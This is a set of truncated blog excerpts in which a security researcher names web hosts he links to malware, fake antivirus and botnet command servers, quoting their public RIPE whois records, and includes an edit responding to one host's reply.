Andrew Martin

The absolute worst culprit that I’ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here. person: Perevitskiy [...]

Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C as reported by Fireeye. inetnum: 92.62.101.0 – 92.62.101.255 netname: STARLINE_EE descr: Starline Web Services country: EE admin-c: VN268-RIPE tech-c: VN268-RIPE status: ASSIGNED PA mnt-by: AS39823-MNT changed: roman@compic.ee 20080403 e-mail: info@starline.ee abuse-mailbox: abuse@starline.ee source: [...]

One of the smaller hosts I’ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We’ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP 84.243.196.0 – 84.243.197.255. inetnum: 84.243.197.0 – 84.243.197.255 netname: GFX-CUST-PORTNAP descr: PortNAP Internet Services org: ORG-PIS13-RIPE [...]

After a weekend hiatus, I’m back with the next host of interest – ZlKon. role: ZlKon HostMaster address: Lilijas iela 4-74 address: Riga, LV-1055 address: Latvija phone: +371 26330593 e-mail: hostmaster@zlkon.lv admin-c: AD5952-RIPE tech-c: AD5952-RIPE nic-hdl: ZK508-RIPE mnt-by: ZLKON-MNT changed: hostmaster@zlkon.lv 20081125 source: RIPE abuse-mailbox: abuse@zlkon.lv Based in Latvia, Zlkon seems to have a high [...]

The next source of badness I’ll cover is UATelecom (AS44997). With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run in with this host which you can read about here (written in German) 91.203.92.0/22 AS44997 netname: BASTION-NET descr: ISP UATelecom country: EU organisation: ORG-TG39-RIPE org-name: UATELECOM LLC. org-type: [...]

**Edit 2** I’d like to thank LeaseWeb for taking the time to respond to this post. It’s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The “fire and forget” mentality of [...]